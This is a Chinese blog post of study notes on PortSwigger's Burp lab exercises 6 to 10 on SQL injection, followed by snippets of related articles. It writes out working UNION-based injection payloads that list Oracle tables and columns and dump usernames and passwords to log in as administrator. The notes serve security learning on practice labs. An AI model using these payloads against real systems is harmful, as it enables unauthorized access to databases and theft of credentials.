Burp靶场sql注入学习笔记2

最新推荐文章于 2026-01-01 22:38:21 发布
原创 最新推荐文章于 2026-01-01 22:38:21 发布 · 717 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #学习 #笔记

6.SQL injection attack, listing the database contents on Oracle

本关需要我们获得Oracle数据库里的数据并登录到管理员

回显列数同样为2列

虽然题目已经提示了是Oracle数据库,但还是验证一下

没问题确实是

MySQL数据库与Oracle数据库注入区别

查表payload

select table_name from information_schema.tables where table_schema='xxx'等于select table_name from user_tables

查列payload

select column_name from information_schema.columns where table_name='xxx'等于select column_name from user_tab_columns where table_name='xxx'

查数据

都一样使用

select 列 from 表

爆数据库

使用payload

a' union select 'null',global_name from global_name--+

爆数据表

使用payload

a' union select 'null',table_name from user_tables--+

爆数据列

使用payload

a' union select 'null',column_name from user_tab_columns where table_name='USERS_NZGDQY'--+

爆数据

使用payload

a' union select 'null',PASSWORD_GZGRDT from USERS_NZGDQY--+

在测试第二个密码my68y5v72tt38ebb1eg4时登录管理员成功

7.SQL injection UNION attack, determining the number of columns returned by the query

本关要求我们查询返回的列数

通过order by得到回显的列数为3列

测试只有第2列和第3列会回显(后面发现第一列是那个view detail的按钮)

很奇怪,这题到这边应该已经要做出来了,已经知道回显列数是3列了,但是题目意思应该是希望我们用select null一个个添加去尝试,那么就尝试三个null,正常来说不会报错

确实没报错并且通过了

8.SQL injection UNION attack, finding a column containing text

本关要求我们找到回显的列并且让其回显题目给的一个随机值

回显列数还是3

直接用union select '1','给的随机值','3'--+

9.SQL injection UNION attack, retrieving data from other tables

本关要求应该就是给我们一个表然后要我们找到里面的账号密码登录管理员

回显列数为2列

既然都给表名了直接爆数据吧

使用payload

a' union select username,password from users--+

出现管理员,登录成功过关

10.SQL injection UNION attack, retrieving multiple values in a single column

本关要求和上一关一样

回显列数为2列

测试了只有第2列能回显,第一列是那个按钮

可以使用concat来查询

payload为

a' union select '1',concat(username,password) from users--+

或者使用concat_ws分隔两个列

payload为

a' union select '1',concat_ws('.......',username,password) from users--+

随后登录管理员成功过关

 

burp 官方靶场 第二章 sql注入
2301_78362619的博客
02-01 1506
要在每个位置测试字符,您需要在您定义的有效负载位置发送合适的有效负载。或者,您可以创建一个具有两个有效载荷位置和“集束炸弹”攻击类型的单个入侵者攻击,并通过偏移量和字符值的所有排列进行工作。现在,您只需对密码中的其他每个字符位置重新运行攻击,以确定它们的值。为此,请返回到主Burp窗口和Burp Intruder的Positions选项卡,并将指定的偏移量从1更改为2。当条件不再为真时(即“欢迎回来”消息消失时),您已经确定了密码的长度,实际上是20个字符长。该行显示的有效载荷是第一个位置的字符的值。
Burp靶场SQL注入学习笔记3
Tonight_Fantasy的博客
04-04 899
本关还是需要获得users表内的账户和密码,但是变成了盲注根据提示,这题的注入点在cookie而不是在url上修改cookie的值页面正常再次修改cookie页面也正常回显,但是登录信息没了那么我们就可以根据这个welcome back来判断SQL语句是否为真既然知道了我们的目标列就是users表里的password,那么就直接爆破吧先判断密码长度使用payload在小于20时没有回显welcome back那么密码长度应该就是20爆数据,配合burp里的intruder模块。
Burp靶场sql注入学习笔记1
Tonight_Fantasy的博客
04-03 911
网页提示网站的sql语句是这样找到注入点为url根据给的查询语句构造payload完成题目需要找到未上架商品或者使用payload也可以找到所有商品包括未上架的。
Burp靶场sql注入学习笔记4
Tonight_Fantasy的博客
04-05 516
本关要求我们拿到管理员账号密码登录进去通过题目描述,应该就是sql延时注入先判断是哪种数据库使用payload页面十秒才回显,说明是postgresql数据库因为在postgresql中没有if函数,所以我们需要使用case when因为已经知道密码在表users中,同时根据前面的关卡猜测密码长度为20可以构造payloadend这些响应时间五千多的就是密码拼接完后密码为:5wgrxlabhxxglsfo82yb。
SQL注入学习笔记
星落
11-04 1368
SQL 注入就是指 web应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql语句来实现对数据库的任意操作;即通过把sql命令插入到Web表单提交或输入域名或页面请求的查询字符串中,最终欺骗服务器执行恶意的SQL命令
portswigger靶场学习笔记(一)sqli注入
weixin_52835927的博客
10-08 699
在本次靶场开始联系之前,已经学习sqli-labs,pikachu,DVWA三个靶场,在学习portswigger的时候,我准备从较为熟悉的sqli注入部分开始。
网络渗透学习笔记——SQL注入练习
qq_58742048的博客
08-06 1946
sqli-labs靶场练习
SQL注入个人笔记(二)
2503_90802500的博客
08-08 918
本文介绍了两种SQL注入的暴力破解方法(布尔盲注和时间盲注)及其对应的工具使用。主要内容包括:1. 工具安装指南:详细介绍了Yakit、Burpsuite和SqlMap三款工具的下载安装方法;2. 布尔盲注原理及实操:通过页面响应差异判断注入结果,演示了使用Burpsuite和Yakit进行字典暴力注入;3. 时间盲注技术:利用响应时间延迟判断注入结果,包括编码盲注和时间盲注的具体实现方法;4. 工具使用技巧:重点讲解了Burpsuite的Intruder模块和Yakit的WebFuzzer功能在注入攻击中
PortSwigger web实验室-SQL注入篇(BP靶场)
2301_79933930的博客
07-30 2364
本文分享了BurpSuite靶场SQL注入漏洞的学习笔记,涵盖了16种不同场景的SQL注入攻击方法。作者从基础的WHERE子句注入、登录绕过开始,逐步深入讲解UNION注入、盲注(包括时间盲注和布尔盲注)、报错注入等高阶技巧,并介绍了如何利用OAST技术进行带外数据泄露。每道题目都包含解题思路、Payload构造过程和实际测试结果,特别针对Oracle、MySQL等不同数据库的语法差异进行了说明。文章还提到如何绕过WAF过滤和使用工具辅助攻击。虽然作者是初学者,但通过靶场实践系统性地总结了SQL注入的各种攻
PortSwigger web实验室(BurpSuit官方靶场)之SQL注入
m0_74824002的博客
12-13 1355
Hi~ o( ̄▽ ̄)ブ,我是一名刚刚开始学习网安的新手。在做PortSwigger实验室(也就是BurpSuit官方做的靶场学习中心)题目的时候发现对于新手来说还是有很多问题的。上网搜索相关文章发现可能是官方跟新了靶场的题目,导致很多文章已经“货不对板”了。思来想去最后决定自己来写一篇通关文章!如果有什么地方写的不好或者有什么错误欢迎大伙指出批评~~ps:该文章包含大量我作为初学者在解题过程中的学习过程和内容,可能会显得很臃肿。
DVWA靶场系列(五)—— SQL Injection(SQL注入
qq_45612828的博客
07-14 2360
DVWA靶场系列(五)—— SQL Injection(SQL注入
Dvwa之SQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1192
SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwa的sql注入的相关笔记。仅供学习。 ​
基础-SQL-DCL
2401_84643729的博客
12-27 339
MySQL基础——SQL——DCL
JSON数据一键导入SQL Server
tzjly的专栏
12-31 463
print(f"📊 共 {len(data) if isinstance(data, list) else 1} 条记录")table_name = input("请输入表名 (默认为 json_data): ") or "json_data"json_file_path = input("请输入JSON文件的完整路径: ").strip()print(f"📄 使用命令行指定的JSON文件: {json_file_path}")print(f"不支持的数据格式: {type(data)}")
DM SQL 排序优化-消除排序
12-31 297
关键发现:上面执行计划中出现了 SORT3 操作符,说明数据库在进行显式排序,可以通过ET 输出,可以判断使用了多少内存(MEM_USED(KB),DISK_USED(KB))。在数据库查询优化中,ORDER BY 子句导致的排序操作往往是性能瓶颈之一。当前测试展示如何通过合理的索引设计来消除排序操作,显著提升查询性能。数据库通过反向扫描索引直接获得了正确排序的结果。业务需求:查询最近11 年的员工信息,并按入职时间降序、员工ID 降序排列。虽然使用了复合索引,但排序方向不匹配。技术分享社区 ECO。
MyBatis SQL解析模块详解
qq_41262225的博客
12-30 1043
MyBatis的SQL解析模块是连接SQL语句与数据库执行的关键桥梁,负责SQL语句解析、动态SQL处理、参数绑定和SQL生成。该模块采用分层设计,核心组件包括LanguageDriver、SqlSource和BoundSql等。动态SQL标签通过OGNL表达式实现条件判断和循环功能,XMLScriptBuilder负责解析SQL脚本为SqlNode树。SqlSource根据是否包含动态标签分为DynamicSqlSource和RawSqlSource,最终生成可执行的BoundSql对象。该模块实现了从X
浅谈Qt中的QSql模块整体设计
最新发布
红军不怕远征难,万水千山只等闲
01-01 556
Qt的QSql模块是Qt框架提供的数据库抽象层,旨在屏蔽不同数据库(如SQLite、MySQL等)的底层API差异,提供统一的操作接口。其核心设计包括三层架构:应用层调用API执行数据库操作,抽象接口层定义统一接口(如QSqlDatabase、QSqlQuery),驱动适配层通过插件机制适配具体数据库。QSql支持SQL执行、参数绑定、事务控制等功能,并与Qt的MVC组件深度整合。模块采用工厂模式、适配器模式等设计模式,确保扩展性和跨平台兼容性。开发者可通过自定义驱动和模型扩展功能,但需注意线程安全和性能优
PostgreSQL 18 从新手到大师:实战指南 - 2.5 Serverless PostgreSQL
AI 题库 —— 软件编程老兵专属分享阵地,聚焦青少年编程等级考、Python/C++ 信息学奥赛、机器人技术等级考试备考干货,依托智能题库资源,用 5 年一线教学经验助力编程学习高效备考!
01-01 770
本文介绍了Serverless PostgreSQL的核心概念及其开源实现Neon。Serverless PostgreSQL采用存储-计算分离架构,具有按需计算、自动扩展、按使用付费等特点,相比传统PostgreSQL大幅简化了运维工作。文章详细解析了Neon的三层架构(计算层、存储层、控制层)及其工作原理,并提供了Neon的安装配置指南和数据库管理方法。Serverless PostgreSQL特别适合访问量波动大、快速开发、SaaS应用等场景,能有效降低资源成本和运维复杂度。
C# 语言 SQL Server 批量更新
StevenChen的博客
12-28 649
本文详细介绍了C#操作SQL Server实现批量更新的多种方案。针对小数据量(1000条以内)推荐参数化SQL拼接或CASE WHEN优化;对于大数据量(1000条以上)建议使用SqlBulkCopy+临时表方案或Dapper框架。重点强调了SQL注入防护、事务保护、连接释放等关键注意事项,并提供了完整的代码实现。不同场景下的最优选择:小数据量注重简洁高效,大数据量追求高性能低损耗,同时兼顾开发效率与数据安全。
pikachu靶场sql注入盲注burp
03-23
### Pikachu靶场 SQL注入盲注与Burp Suite使用教程 #### 一、SQL注入盲注概述 SQL盲注是一种通过观察程序返回的结果来推测数据库结构和内容的技术。它通常分为两种类型:基于布尔的盲注和基于时间的盲注[^4]。 - *...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值